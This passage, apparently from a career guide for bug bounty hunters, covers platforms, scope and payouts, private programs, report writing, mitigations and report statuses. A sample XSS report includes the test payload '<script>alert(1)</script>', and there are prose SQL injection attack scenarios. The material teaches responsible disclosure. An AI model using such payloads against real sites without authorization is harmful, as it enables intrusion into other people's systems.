grams may include other assets such as:
- Corporate Networks: Programs may include assessing the
security of a company's internal network.
- Desktop Software: Desktop applications may also be sub-
ject to penetration testing for vulnerabilities.
- Custom Hardware Systems: Some companies develop
hardware specific to their products or services, which may also
be included in Bug Bounty programs.
The diversity of assets in Bug Bounty programs offers a wide
range of opportunities for security researchers. By understan-
ding the different types of assets and the vulnerabilities asso-
ciated with each, you will be able to choose the programs that
best suit your skills and interests, maximizing your chances of
success and contributing to a more secure digital environment.
4.4 – PL ATFORMS #4.4
Platforms play a key role as a meeting point between
security researchers and companies looking to strengthen the
protection of their digital assets. This chapter will immerse you
in the fascinating universe of Bug Bounty Platforms, exploring
their features, benefits and how to make the most of them to
boost your career as a bounty hunter.
What are Bug Bounty Platforms?
Bug Bounty platforms are websites or applications that
act as intermediaries between companies offering bug bounty
programs and security researchers looking to identify vulnera-
bilities. These platforms provide a structured and secure envi-
ronment for collaboration, facilitating communication, reporting
and bounty payment.
Key Features of Bug Bounty Platforms.
1. Program Listings: The platforms offer a comprehensive
directory of Bug Bounty programs from various companies and
industries, allowing you to explore and choose those that align
with your interests and skills.
2. Clear Guidelines and Rules: Each program has specific
rules about what assets are in scope, what types of vulnerabi-
lities are eligible for rewards and how they should be reported.
The platforms ensure that these rules are clear and accessible
to all participants.
3. Reporting system: The platforms provide a standardized
system for submitting vulnerability reports, including technical
details, proofs of concept and remediation recommendations. This
facilitates communication between researchers and companies.
4. Reward Management: The platforms manage the pay-
ment of rewards to researchers, ensuring that they receive fair
and timely compensation for their findings.
5. Leaderboards and Statistics: Many platforms offer lea-
derboards that show the most successful researchers, as well as
statistics on reported programs and vulnerabilities. This encou-
rages healthy competition and recognition of researchers.
6. Forums and Communities: Platforms often have online
forums and communities where researchers can interact,
share knowledge, ask questions and collaborate on finding
vulnerabilities.
Benefits of Using Bug Bounty Platforms
- Access to a Wide Range of Programs: The platforms allow
you to explore a wide variety of programs from different com-
panies and industries, expanding your opportunities to find vul-
nerabilities and earn rewards.
- Clear Rules and Guidelines: The platforms ensure that
the rules of each program are clear and transparent, avoiding
misunderstandings and guaranteeing a fair experience for all
participants.
- Efficient Reporting: The platforms' reporting system faci-
litates communication between researchers and companies,
streamlining the vulnerability review and remediation process.
- Secure and Timely Reward Payment: The platforms manage
reward payments, ensuring that researchers receive fair and
timely compensation for their findings.
- Learning and Collaboration Opportunities: The platforms'
forums and communities provide a space to interact with other
researchers, share knowledge, and learn from the experiences
of others.
- Recognition and Reputation: Participating in Bug Bounty
programs across platforms allows you to build your reputation
as a security researcher and gain recognition in the community.
Popular Bug Bounty Platforms
- HackerOne: One of the largest and most popular plat-
forms, with a wide variety of programs from leading techno-
logy companies.
- Bugcrowd: Another major platform with a large commu-
nity of researchers and an intuitive interface.
- Intigriti: A growing European platform with a focus on
program quality and collaboration with researchers.
- YesWeHack: A platform with a strong presence in Europe
and Asia, offering a wide range of security programs and services.
Tips for Getting the Most Out of Bug Bounty Platforms
- Research and Choose the Right Programs: Explore the
program listings, read the rules and guidelines, and choose those
that align with your interests and skills.
- Report Quality Vulnerabilities: Focus on finding signifi-
cant, high-impact vulnerabilities and write clear, detailed reports
that facilitate understanding and remediation by the business.
- Be Professional and Collaborative: Maintain respectful
and constructive communication with companies, and collabo-
rate with them to address vulnerabilities efficiently.
- Participate in the Community: Join the platforms' forums
and communities to interact with other researchers, share
let ' s get to work 147
knowledge and learn from others' experiences.
Bug Bounty's platforms are a vibrant and constantly evol-
ving ecosystem that offers unique opportunities for security
researchers. By taking advantage of the features and benefits
of these platforms, you can boost your Bug Bounty career, con-
tribute to online security, and gain recognition for your skills
and knowledge.
4. 5 – SC O P E , P AY M E N T S
AN D R ES P O NS E T I M E S
# 4. 5
Understanding outreach, payouts and response times is cru-
cial to maximizing your efforts and getting the most out of your
participation. This chapter will guide you through these essen-
tials, providing you with valuable information to make informed
decisions and optimize your experience as a security researcher.
Scope: Defining the Boundaries of the Hunt
- The scope of a Bug Bounty program clearly defines which
assets are included in the program and therefore eligible for
security testing and rewards. It is critical to understand the scope
before you start looking for vulnerabilities, as this will help you
focus your efforts in the right areas and avoid reporting issues
that are outside the established boundaries.
- Scopes can vary significantly between programs. Some
programs may include a wide range of assets, such as web appli-
cations, mobile applications, APIs, cloud infrastructures and IoT
devices. Other programs may have a more limited scope, focu-
sing on specific assets or certain types of vulnerabilities.
When reviewing the scope of a program, pay attention to the
following details:
- Assets included: what products, services or systems are
included in the scope?
- Exclusions: Are there assets or types of vulnerabilities that
are explicitly excluded from the program?
- Restrictions: Are there restrictions on allowable testing
148 MILLIONAIRE RECORDS
techniques?
- Disclosure requirements: How are you expected to report
vulnerabilities found?
Payouts: Rewards for your Work
Payouts are the primary incentive for Bug Bounty resear-
chers. Companies offer financial rewards for responsible vulne-
rability identification and reporting. Reward amounts can vary
significantly depending on the severity of the vulnerability, the
potential impact, and the company's reward policy.
When evaluating a program's payouts, consider the
following factors:
- Reward structure: how are reward amounts determined;
are they based on severity of vulnerability, potential impact, or
a combination of both?
- Minimum and maximum: What is the minimum and maxi-
mum reward offered by the program?
- Bonuses: Are bonuses offered for finding especially criti-
cal vulnerabilities or for exceptional reporting?
- Payment methods: How are payments made - cash, gift
cards, cryptocurrencies?
- Payment terms: How long does it usually take for the
company to pay out rewards?
Response Times: The Importance of Communication.
Response times refer to the time it takes for a company to
respond to vulnerability reports. A quick response time is crucial
to ensure that vulnerabilities are addressed in a timely manner
and risk to users is minimized.
When evaluating a program's response times, consider the
following aspects:
- Initial response time: How long does it take for the com-
pany to acknowledge receipt of a vulnerability report?
- Triage time: How long does it take the company to assess
the severity of a vulnerability and assign it to a development
team for remediation?
- Remediation time: How long does it take the company to
develop and deploy a patch to address the vulnerability?
- Communication during the process: Does the company
keep researchers informed about the progress of the remediation?
 Tips for Choosing a Bug Bounty Program

- Align your skills and interests: Choose programs that focus

on areas in which you have experience and expertise.

- Research the company's reputation: Look for information

about the company's reputation in the Bug Bounty community.
Do they pay rewards on time? Are they responsive to vulnera-
bility reports?

- Read the rules and scope carefully: Make sure you unders-
tand the program rules and the scope of testing allowed.

- Evaluate rewards and response times: Consider whether

the rewards offered are fair and if response times are reasonable.

- Look for programs with good communication: Choose pro-

grams that have a clear and transparent communication chan-
nel with researchers.

By understanding the scope, payouts and response times,

you will be better prepared to choose the right Bug Bounty pro-
grams for you and maximize your chances of success. Remember,
the key is to research, evaluate and choose wisely to find the
programs that best suit your goals and skills.

let ' s get to work 149

4. 6 – P R I V ATE P R O-
G R AMS # 4 . 6
Private programs represent a higher level of collaboration
and trust between companies and security researchers. This chap-
ter will immerse you in the world of private programs, exploring
their distinctive features, advantages and how to access them
to take your Bug Bounty career to the next level.
What are Private Programs?
Unlike public programs, which are open to any investigator,
private programs are exclusive invitations to a select group of
security experts. Companies carefully select investigators based
on their experience, reputation and specialized skills.
Distinctive Features of Private Programs
1. Limited Access: Only invited investigators can partici-
pate in private programs. This creates a more controlled and
focused environment where companies can work closely with
trusted experts.
2. Increased Scope and Flexibility: Private programs typi-
cally have a broader scope than public programs, including cri-
tical and sensitive assets that are not publicly exposed. In addi-
tion, companies can be more flexible in terms of the rules and
types of vulnerabilities they accept.
3. Higher Rewards: Due to the critical nature of the assets
and the exclusivity of the programs, rewards in private programs
are often significantly higher than in public programs.
4. Direct Communication: Researchers in private programs
have direct access to corporate security teams, which facilitates
communication and collaboration on vulnerability resolution.
5. Unique Learning Opportunities: Participating in private
programs gives you the opportunity to work on challenging,
high-impact projects, learn from industry experts and expand
your knowledge and skills.
Advantages of Bug Bounty's Private Programs
- Higher Rewards: The possibility of more substantial
rewards is an attractive incentive for researchers looking to
maximize their income.
- Greater Impact: By working on critical assets, your findings
can have a significant impact on the security of the company
150 MILLIONAIRE RECORDS
and its users.
- Close Collaboration: Direct communication with enter-
prise security teams allows you to work as a team and learn from
subject matter experts.
- Access to Exclusive Resources: In some cases, private pro-
grams offer researchers access to exclusive resources, such as tes-
ting environments, internal documentation and specialized tools.
- Recognition and Prestige: Being invited to a private pro-
gram is recognition of your skills and experience, which can boost
your career and open up new opportunities.
How to Access Private Programs
1. Build your Reputation: Actively participate in public pro-
grams, report quality vulnerabilities, create educational content
and share your knowledge in the security community.
2. Make Connections: Attend security conferences, partici-
pate in industry events, and connect with other security resear-
chers and practitioners.
3. Request Invitations: Some Bug Bounty platforms allow
you to request invitations to private programs. You can also con-
tact the companies you are interested in directly and express
your interest in participating in their programs.
4. Demonstrate your Skills: When you are invited to a pri-
vate program, be sure to demonstrate your skills and knowle-
dge by reporting high quality vulnerabilities and collaborating
effectively with the company.
Bug Bounty's private programs offer a unique opportunity
for security researchers looking for bigger challenges, higher
rewards and closer collaboration with companies. By building
your reputation, establishing connections and demonstrating
your skills, you can open doors to this exclusive world and take
your Bug Bounty career to the next level.
4 .6 – T H E "R IGH T PRO-
GR AM" # 4 .7
Choosing the right program is crucial to maximizing your
success and satisfaction as a security researcher. This chapter
will guide you through the key factors to consider when selec-
ting a program, giving you the tools you need to make informed
and strategic decisions.
 1. Define your Objectives and Priorities
Before diving into the program search, it is critical that you
clearly define your goals and priorities. What are you looking to
achieve through your participation in Bug Bounty? Do you want
to earn money, gain experience, build your reputation, or con-
tribute to the security of a specific project?
Also, consider your skills and areas of expertise: Are you an
expert in web security, mobile applications, cloud infrastructure
or IoT devices? Do you prefer to look for specific vulnerabilities,
such as SQL injection or XSS?
Finally, evaluate how much time you can devote to bug
hunting - can you devote full time or just a few hours a week?
2. Research Available Programs
Once you've defined your goals and priorities, it's time to
research the Bug Bounty programs available. You can find pro-
grams on various platforms, such as HackerOne, Bugcrowd,
Intigriti and YesWeHack. These platforms offer a wide variety
of programs from different companies and industries, allowing
you to explore and compare different options.
In addition to platforms, you can also research private pro-
grams that are not publicly listed. Some companies have in-house
programs or work with private platforms to manage their Bug
Bounty programs. You can find information about these programs
on company websites, on social media or through contacts in
the security community.
3. Evaluate Programs in Detail
When evaluating Bug Bounty programs, it is important to
consider several key factors:
- Scope (Scope): what assets are included in the program -
web apps, mobile apps, APIs, cloud infrastructure, IoT devices?
Are there specific areas excluded from the scope?
- Rules: What are the program rules, what types of vulnera-
bilities are eligible for rewards, are there restrictions on allowable
testing techniques, what are the responsible disclosure policies?
- Payouts: What kind of rewards are offered: cash, swag,
reputation points, public recognition? What is the range of
rewards for different types of vulnerabilities? Is there a bonus
program?
- Communication: How does the company communicate
with researchers? Is there a clear and transparent communica-
tion channel? Do they respond quickly to vulnerability reports?
Do they provide constructive feedback?
Reputation: What is the company's reputation in the
Bug Bounty community? Do they pay rewards on time? Do they
recognize the work of researchers? Are they responsive to com-
ments and suggestions?
4. Prioritize Programs that Align with Your Objectives
Once you've evaluated several programs, it's time to prio-
ritize those that best align with your goals, skills, and time avai-
lability. Consider the following aspects:
- Alignment with your Interests and Skills: Choose programs
that focus on areas in which you have experience and expertise.
This will allow you to leverage your strengths and maximize your
chances of success.
- Reward Potential: If your primary goal is to earn money,
prioritize programs that offer attractive rewards and match your
expectations.
- Communication and Transparency: If you value open and
transparent communication, choose programs that have a good
track record of communicating with researchers and are clear
about their rules and processes.
- Reputation: If you are looking to build your reputation in
the Bug Bounty community, choose programs from reputable
companies that recognize the work of researchers.
5. Start Searching for Vulnerabilities
Once you've chosen a program, it's time to start looking
for vulnerabilities. Read the program documentation carefully
to familiarize yourself with the rules, scope and rewards. Use
appropriate tools and techniques to identify potential vulnera-
bilities, and report your findings responsibly following the pro-
gram's guidelines.
Additional Tips:
- Don't Limit Yourself to a Single Program: Participate in
multiple programs to diversify your opportunities and learn from
different companies and technologies.
- Be Persistent and Patient: Finding vulnerabilities can take
time and effort. Don't get discouraged if you don't find anything
right away.
- Learn from your Mistakes: If your reports are rejected,
learn from the feedback and improve your skills.
let ' s get to work 151
 - Collaborate with Other Researchers: Working in teams
can be a great way to learn, share knowledge and increase your
chances of success.
- Stay Current: Cybersecurity is constantly evolving. Stay
up-to-date on the latest trends, techniques and tools to stay
competitive.

Choosing the right Bug Bounty program is a crucial deci-

sion for your success as a security researcher. By defining your
goals, researching available programs, carefully evaluating key
factors and prioritizing the programs that best suit your needs,
you'll be on the right path to building a rewarding career and
contributing to a safer digital environment.

Here is a graphical comparison of the bug bounty tables of

some of the most famous programs.

Some important notes about this comparison:

- Bounty amounts may vary: The figures shown are appro-

ximate and may change depending on the severity of the vul-
nerability and the policy of each program.
- Not all programs have the same categories: Some pro-
grams may have additional categories or different names for
the same vulnerabilities.
- Company reputation is also important: In addition to
rewards, consider the company's reputation in the Bug Bounty
community, its payment history and its communication with
researchers.

How to use this table?

This table can help you to:

- Compare rewards: See which programs offer the highest

rewards for the types of vulnerabilities you are interested in.
- Choose programs: Select programs that match your skills
and objectives.
- Negotiate rewards: Get an idea of the usual payout ran-
ges for different vulnerabilities.

152 MILLIONAIRE RECORDS

let ' s get to work 153

DETAILS THAT MAKE THE DIFFERENCE
LEARN FROM SANTIAGO
4.8 – GOOD REPORT
# 4. 8
The ability to write a clear, concise and effective report is
crucial to success. A good report not only ensures that the vul-
nerability is understood and resolved quickly, but also reflects
your professionalism and increases your chances of receiving a
fair reward. This chapter will guide you through the key elements
of a high-quality Bug Bounty report.
1. Clear and Descriptive Title:
The title should concisely summarize the vulnerability found.
It should be specific enough so that the company's security team
can quickly identify the problem, but also general enough to avoid
revealing sensitive details before it has been fixed.
Example:
- Good: "SQL Injection vulnerability in the search parameter."
- Bad: "Website security issue".
2. Executive Summary:
The executive summary is a brief description of the vulne-
rability, its potential impact, and the recommended solution. It
should be concise enough for an executive to quickly unders-
tand, but also detailed enough for a technician to begin working
on the solution.
154 MILLIONAIRE RECORDS
Example:
A SQL injection vulnerability has been discovered in
the website search parameter. This vulnerability allows an atta-
cker to execute malicious SQL commands in the database, which
could result in disclosure of sensitive information, modification
of data or even taking control of the server. It is recommended
to implement proper input validation and use parameterized
queries to prevent this type of attack.
3. Detailed Technical Description:
This section should provide a detailed technical explana-
tion of the vulnerability, including:
- Steps to Reproduce: Step-by-step instructions on how to
reproduce the vulnerability.
- Proof of Concept (PoC): Code or examples that demons-
trate the vulnerability in action.
- Impact: A description of the potential impact of the vul-
nerability, including the data or systems that could be affected.
- Root Cause: An explanation of the root cause of the vul-
nerability, i.e., the error in the code or configuration that allows
it to occur.
4. Recommended Solution:
Offer one or more solutions to remediate the vulnerabi-
lity. Be specific and provide code or configuration examples if
possible.
5. Additional Information:
Include any other relevant information, such as screenshots,
debug logs, or references to similar vulnerabilities.
Tips for Writing a Good Report:
- Be clear and concise: Avoid unnecessary technical lan-
guage and use simple, straightforward language.
- Be objective and professional: Avoid accusatory or threa-
tening language.
- Be accurate and detailed: Provide enough information for
the security team to reproduce and fix the vulnerability.
- Be respectful and collaborative: Work with the security
team to find the best possible solution.
155
let ' s get to work 155
 Sample Full Report:
Title: Cross-Site Scripting (XSS) Vulnerability Reflected in
Search Field.
Summary: A cross-site scripting (XSS) vulnerability has been
discovered in the search field of the website. This vulnerability
allows an attacker to inject malicious JavaScript code into the
search results page, which then executes in the victim's browser.
This could result in stealing session cookies, disclosing sensitive
information or performing unauthorized actions on behalf of the
victim. It is recommended to implement proper input validation
and encrypt output to prevent this type of attack.
Detailed Technical Description:
Vulnerable URL: [URL].
Vulnerable parameter: q
Example payload: <script>alert(1)</script>.
Steps to reproduce:
1. Navigate to [URL]/<script>alert(1)</script>
Notice that a JavaScript alert is executed.
2. Impact:
- Session cookie theft.
- Disclosure of confidential information
- Performing unauthorized actions on behalf of the
victim.
Root Cause:
- Lack of input validation in search parameter.
- Lack of output coding on the search results page.
Recommended Solution:
- Input validation: Implement strict input validation in the
search parameter to reject any input containing special charac-
ters or scripts.
- Output Encoding: Encodes all search parameter output
before displaying it on the search results page.
Additional Information:
- Screenshot of the JavaScript alert.
- Link to OWASP XSS Prevention Cheat Sheet: https://
cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_
Prevention_Cheat_Sheet.html
By writing a good detailed report, you have a much bet-
ter chance that the Triage team will be able to reproduce your
156 MILLIONAIRE RECORDS
vulnerability more easily and accurately. Ultimately, this will
give you a better chance of a guaranteed payout and a much
faster process.
Impact and Attack Scenarios
Also, the ability to describe the impact and attack scenarios
of a vulnerability is essential to demonstrate its severity and rele-
vance. This chapter will guide you through the steps necessary
to effectively communicate the potential damage a vulnerability
can cause and how an attacker could exploit it.
1. Understand the Potential Impact
Before describing the impact, it is crucial to thoroughly
understand the vulnerability and its potential consequences.
Consider the following aspects:
- Confidentiality: Could the vulnerability allow an attacker
to access sensitive data, such as personal information, financial
information or trade secrets?
- Integrity: Could an attacker modify or delete data without
authorization, causing damage or disruption to the system?
- Availability: Could the vulnerability be used to launch a
denial-of-service (DoS) attack, making the system or service
unavailable to legitimate users?
- Financial impact: Could exploitation of the vulnerability
result in direct or indirect financial loss to the company, such as
theft of funds, fraud or reputational damage?
- Physical security impact: In some cases, vulnerabilities in
systems connected to physical devices could have real-world
consequences, such as unauthorized control of industrial sys-
tems or medical devices.
2. Identify Attack Scenarios
Once you understand the potential impact, it's time to iden-
tify the most likely attack scenarios. Consider how an attacker
could exploit the vulnerability to achieve their goals.
- Direct attack: Could the attacker exploit the vulnerability
directly, without the need for additional steps?
- Chain attack: Could the vulnerability be used in combi-
nation with other vulnerabilities to achieve a more sophistica-
ted attack?
- Targeted attack: Could the attacker customize the attack
to target specific users or systems?
- Automated attack: Could the vulnerability be exploited
on a large scale using automated tools?
3. Describe the Impact and Attack Scenarios in Your Report
When writing your Bug Bounty report, be sure to include
a detailed section describing the impact and attack scenarios
of the vulnerability. Use clear and concise language, and avoid
exaggeration or speculation.
- Impact: Describe the potential impact of the vulnerability
in terms of confidentiality, integrity, availability, financial impact
and physical security.
- Attack scenarios: Describes the most likely attack sce-
narios, including the steps an attacker could take to exploit the
vulnerability and the objectives they could achieve.
- Evidence: Provide proof of concept (PoC) that demons-
trates the vulnerability in action and supports your claims about
the impact and attack scenarios.
Example:
Impact: SQL injection vulnerability allows an attacker
to execute arbitrary SQL commands in the application database.
This could result in the disclosure of sensitive user information
such as names, email addresses, passwords and financial infor-
mation. In addition, an attacker could modify or delete data in
the database, which could disrupt business operations or cause
financial damage.
Attack scenarios: An attacker could exploit this vulne-
rability by injecting malicious SQL code into application input
parameters such as search fields or forms. For example, an atta-
cker could inject an SQL query to extract all records from the
user table, or to modify a specific user's data.
Proof of Concept: Attached is a Python script that
demonstrates how to exploit the SQL injection vulnerability to
extract data from the database.
Tips:
- Be specific and realistic: Avoid generalizations and pro-
vide concrete details on how the vulnerability could be exploi-
ted and what damage it could cause.
- Prioritize the impact: Emphasize the most serious and
relevant impacts to the business.
- Be professional and objective: Avoid alarmist or sensa-
tionalist language.
By describing the impact and attack scenarios clearly and
effectively, you are helping the business understand the seve-
rity of the vulnerability and take the necessary steps to protect
its systems and users.
Recommend Possible Mitigations (optional)
The ability to recommend effective mitigations is as impor-
tant as discovering the vulnerability itself. A good report should
not only identify the problem, but also provide practical and via-
ble solutions to address it. This chapter will guide you through
the steps for recommending sound and relevant mitigations in
your Bug Bounty reports.
1. Understand the Root Cause:
Before recommending mitigations, it is critical to understand
the root cause of the vulnerability. What error in the code, con-
figuration, or application logic allows the vulnerability to exist?
Identifying the root cause will allow you to propose specific and
effective solutions rather than simply applying superficial patches.
2. Research Best Practices:
Once you have identified the root cause, research best
practices and recommended solutions for that type of vulnera-
bility. Consult resources such as:
- OWASP (Open Web Application Security Project): OWASP
offers detailed guidance and recommendations on how to pre-
vent and mitigate a wide range of web vulnerabilities.
- NIST (National Institute of Standards and Technology):
NIST provides security standards and guidelines for different
technologies and industries.
- Security blogs and forums: Check out security blogs and
forums for the latest trends and expert-recommended solutions.
3. Consider the Application Context:
Mitigations should be tailored to the specific context of the
affected application or system. Consider the following aspects:
- Technology: What programming language, framework or
platform is used?
- Architecture: What is the architecture of the application;
is it a web, mobile, desktop or cloud application?
- Security requirements: What are the specific security
let ' s get to work 157
requirements of the application or system?
- Constraints: Are there any technical or resource cons-
traints that may affect the implementation of certain mitigations?
4. Propose Specific and Actionable Mitigations:
In your Bug Bounty report, present clear, specific and actio-
nable mitigations. Avoid generalities and provide technical details
on how to implement the proposed solutions.
- Prioritize Mitigations: If there are several possible solu-
tions, prioritize those that are most effective, easy to imple-
ment, and have the least impact on application performance
and functionality.
- Provide Code Examples: If possible, include code examples
or configurations that illustrate how to implement the recom-
mended mitigations.
- Consider Temporary Mitigations: If it is not possible to
implement a permanent solution immediately, suggest tempo-
rary mitigations that can reduce risk while a long-term solution
is being developed.
5. Be Realistic and Balanced:
Recognize that not all vulnerabilities can be fixed immedia-
tely or with a perfect solution. Be realistic about the limitations
and propose mitigations that are feasible and provide a balance
between security, functionality and performance.
Example Mitigation Recommendation:
Vulnerability: SQL injection in the search parameter.
Root Cause: Lack of input validation and use of dyna-
mic SQL queries.
Recommended mitigation:
1. Input validation: Implement strict input validation on the
search parameter to allow only alphanumeric characters and a
limited set of special characters.
2. Parameterized queries: Use parameterized queries or
stored procedures to prevent injection of malicious SQL code.
3. Escape special characters: If it is not possible to use para-
meterized queries, escape all special characters in the user input
before including them in the SQL query.
158 MILLIONAIRE RECORDS
Additional Tips:
- Stay current: Technology and security best practices
are constantly evolving. Stay informed about the latest trends
and solutions in order to provide relevant and up-to-date
recommendations.
- Be flexible: Tailor your recommendations to the specific
needs and constraints of each company and application.
- Communicate clearly: Explain mitigations clearly and con-
cisely, using language that is understandable to both technical
and non-technical audiences.
By following these steps and providing sound and relevant
mitigation recommendations, you will be making a significant con-
tribution to improving the security of applications and systems,
and strengthening your reputation as a Bug Bounty researcher.
Validate the report
Report validation is a crucial step in ensuring the quality
and accuracy of your findings. A well-validated report not only
increases your chances of receiving a reward, but also strengthens
your reputation as a reliable and professional security resear-
cher. This chapter will guide you through the best practices and
techniques for validating your Bug Bounty reports before sub-
mitting them to companies.
1. Check Reproducibility:
The first step in validating your report is to ensure that the
vulnerability is reproducible. Follow the steps you described in
your report and check if you can consistently replicate the vul-
nerability. If you cannot reproduce it, you may have made a mis-
take in your analysis or the vulnerability may have been fixed
since you found it.
2. Verify the Impact:
Make sure the impact you described in your report is accu-
rate and realistic. Does the vulnerability actually allow the attacker
to perform the actions you mentioned? Is the potential impact as
severe as you described? If necessary, perform additional tests
to confirm the actual impact of the vulnerability.
3. Check the Root Cause:
Check if you have correctly identified the root cause of
the vulnerability - is it a bug in the code, a misconfiguration, or
a design problem? Understanding the root cause will help you
propose more effective mitigations and avoid superficial solu-
tions that do not address the underlying problem.
4. Test Mitigations:
If you have proposed mitigations in your report, test them
to ensure that they actually address the vulnerability. Implement
the mitigations in a test environment and verify if the vulnera-
bility can no longer be exploited.
5. Check the wording and structure:
Make sure your report is well written and structured. Use
clear and concise language, avoid grammatical and spelling errors,
and organize the information in a logical and easy-to-follow man-
ner. A well-written report is not only easier to understand, but
also demonstrates your professionalism and attention to detail.
6. Ask for a second opinion:
If possible, ask another security researcher to review your
report. A second opinion can help you identify errors or areas
for improvement that you may have overlooked. It can also give
you a different perspective on the vulnerability and its poten-
tial impacts.
7. Use Validation Tools:
There are automated tools that can help you validate your
Bug Bounty reports. These tools can scan your report for com-
mon errors, such as incomplete information, incorrect format-
ting or lack of proof of concept.
Anything else?
- Take your time: Don't rush to submit your report. Take the
time to carefully validate it and make sure it is as accurate and
complete as possible.
- Be Honest and Transparent: If you find errors or incon-
sistencies in your report, don't try to hide them. Be transparent
with the company and correct the errors before submitting the
final report.
- Learn from your Mistakes: If your report is rejected or recei-
ves negative comments, don't be discouraged. Learn from your
mistakes and use that experience to improve your future reports.
Report validation is an essential step in the Bug Bounty
process. By taking the time to validate your findings, you are
demonstrating your commitment to quality and accuracy, and
increasing your chances of receiving a fair reward.
4.9 – BUILDING A RELA-
T ION SH IP #4 .9
Effective collaboration with the development team is essen-
tial to ensure that vulnerabilities are fixed quickly and efficiently.
This chapter will guide you through strategies and best practices
for building a strong and productive relationship with the develo-
pment team, fostering trust, communication and mutual respect.
1. Understand their perspective:
The first step in building a good relationship is to unders-
tand the development team's perspective. They are responsible
for creating and maintaining the software, and they often have
tight deadlines and multiple priorities. By understanding their
challenges and constraints, you can tailor your communication
and approach to be more effective.
2. Communicate Clearly and Professionally:
Clear and professional communication is the foundation of
any good relationship. When reporting vulnerabilities, be sure to:
- Be clear and concise: Describe the vulnerability accurately
and in detail, using appropriate technical language.
- Avoid accusatory language: Don't blame or criticize the
development team. Instead, focus on the problem and how to
fix it.
- Be respectful and collaborative: Show appreciation for
their work and offer your help in fixing the vulnerability.
- Answer their questions: If the development team has ques-
tions about your report, respond in a timely and thorough manner.
3. Provide Detailed and Actionable Information:
To help the development team understand and fix the vul-
nerability, provide the following information in your report:
- Steps to reproduce: Detailed instructions on how to
let ' s get to work 159
reproduce the vulnerability.
- Proof of Concept (PoC): Code or examples that demons-
trate the vulnerability in action.
- Impact: A description of the potential impact of the vul-
nerability, including the data or systems that could be affected.
- Root Cause: An explanation of the root cause of the vul-
nerability, i.e., the error in the code or configuration that allows
it to occur.
- Recommended mitigations: Suggestions on how to fix
the vulnerability.
4. Be Patient and Understanding:
Fixing vulnerabilities can take time, especially if they are
complex or affect critical systems. Be patient and understan-
ding with the development team, and avoid pressuring them or
demanding quick fixes.
5. Offer your help:
If you have relevant knowledge or experience, offer your
help to the development team to fix the vulnerability. This may
include:
- Providing additional information: If the development team
needs more details or clarification, offer to provide it.
- Helping with testing: If you have access to a test environ-
ment, offer to help test proposed solutions.
- Share your expertise: If you have expertise in a specific
area of security, share your knowledge with the development
team to help them improve their security practices.
6. Thank and Acknowledge their Work:
When the development team has fixed the vulnerability,
thank and acknowledge their work. This will help build a posi-
tive relationship and foster future collaboration.
Additional Tips:
- Be Proactive: If you see that a vulnerability report has
been open for a long time with no response, reach out to the
development team to offer your help.
- Be constructive: If you have comments or suggestions
about the Bug Bounty program, share them constructively with
the company.
- Be a good ambassador: Represent the Bug Bounty com-
munity in a positive and professional manner.
160 MILLIONAIRE RECORDS
Building a strong relationship with the development team is
essential to success in the Bug Bounty world. By understanding
their perspective, communicating effectively, providing detailed
information and offering your assistance, you can foster collabo-
ration and ensure that vulnerabilities are fixed efficiently, bene-
fiting both the company and its users.
Understanding Report States
Vulnerability reports go through different states as they are
reviewed, assessed and fixed by companies. Understanding these
states is crucial for security researchers, as it allows them to track
the progress of their reports, understand companies' decisions,
and manage their expectations for rewards and recognition. This
chapter will walk you through the most common reporting statu-
ses on Bug Bounty platforms and provide valuable information
for interpreting and responding to each.
1. New:
This is the initial status of a report when it is first submitted
to the platform. It indicates that the report is pending review by
the company's triage team. At this stage, it is important to be
patient and wait for the company to review your report.
2. Triaged:
In this status, the company's triage team has reviewed your
report and confirmed that it is a valid vulnerability. The vulne-
rability is now assigned to a development team for analysis
and remediation. This status indicates that your report is being
taken seriously and that steps are being taken to address the
vulnerability.
3. Needs More Info:
In some cases, the triage team or development team may
need more information to understand or reproduce the vulne-
rability. If your report is in this status, respond to the company's
questions in a timely manner and provide any additional infor-
mation they may need.
4. Resolved:
This status indicates that the company has resolved the vul-
nerability. At this point, you may receive a reward and/or public
recognition for your contribution, depending on program policies.
5. Not Applicable:
If your report does not meet the program requirements or if
the reported vulnerability is not considered valid, the report may
be marked as "Not Applicable". This may happen if the vulnera-
bility is already known, if it is outside the scope of the program
or if it does not represent a significant security risk.
6. Informative:
In some cases, reports that do not qualify for a reward may
be marked as "Informative". This means that the information
provided in the report is valuable to the company, but does not
meet the criteria to receive a reward.
7. Duplicate:
If another researcher has already reported the same vulne-
rability before you, your report may be marked as "Duplicate".
In this case, you will not receive a reward, but your report can
be used as additional evidence to confirm the existence of the
vulnerability.
8. Won't Fix:
On rare occasions, a company may decide not to fix a repor-
ted vulnerability. This may happen if the vulnerability is consi-
dered low risk, if the fix is too costly or complex, or if the vul-
nerability is present in a system that will soon be discontinued.
9. Closed:
This status indicates that the life cycle of the report has
ended. This can occur when the vulnerability has been resol-
ved, when the report has been marked as "Not Applicable",
"Duplicated" or "Will Not Be Remedied", or when an agreement
has been reached between the researcher and the company.
Tips for Interpreting Report Statuses:
- Be patient: The vulnerability review and remediation pro-
cess can take time. Don't despair if your report does not change
status immediately.
- Communicate proactively: If you have questions or con-
cerns about the status of your report, don't hesitate to contact
the company.
- Learn from feedback: If your report is rejected or marked
as "Not Applicable," take advantage of the company's feedback
to improve your future reports.
Understanding the different statuses of Bug Bounty reports
is essential to managing your expectations and communicating
effectively with companies. By following best practices and uti-
lizing this information, you will be better prepared to navigate
the Bug Bounty process and maximize your impact as a security
researcher.
Dealing with Conflict
Conflict can arise in a variety of situations, from disagree-
ments over the severity of a vulnerability to misunderstandings
in communication with companies. This chapter will provide you
with strategies and tips for managing conflict effectively, while
maintaining professional and constructive relationships with
companies and other researchers.
1. Remain Calm and Professional:
When conflict arises, it is crucial to remain calm and act in
a professional manner. Avoid emotional or impulsive responses,
and focus on resolving the problem constructively. Remember
that the goal is to find a solution that benefits all parties involved.
2. Communicate Clearly and Respectfully:
Clear and respectful communication is critical to resolving
any conflict. Explain your point of view clearly and concisely,
using professional language and avoiding accusations or perso-
nal attacks. Listen carefully to the other party's perspective and
try to understand their concerns.
3. Look for common ground:
Instead of focusing on differences, look for common ground
and areas of agreement. This can help build common ground and
make it easier to find a mutually acceptable solution.
4. Be Flexible and Open to Compromise:
In many cases, conflict can be resolved through compromise.
Be willing to consider different perspectives and make conces-
sions if necessary. Remember that the goal is to find a solution
that works for everyone, not to win at all costs.
let ' s get to work 161

5. Use Appropriate Communication Channels:
If the conflict arises on a Bug Bounty platform, use the
communication channels provided by the platform to resolve
the issue. Avoid taking the conflict to public forums or social
networks, as this can worsen the situation and damage your
reputation.
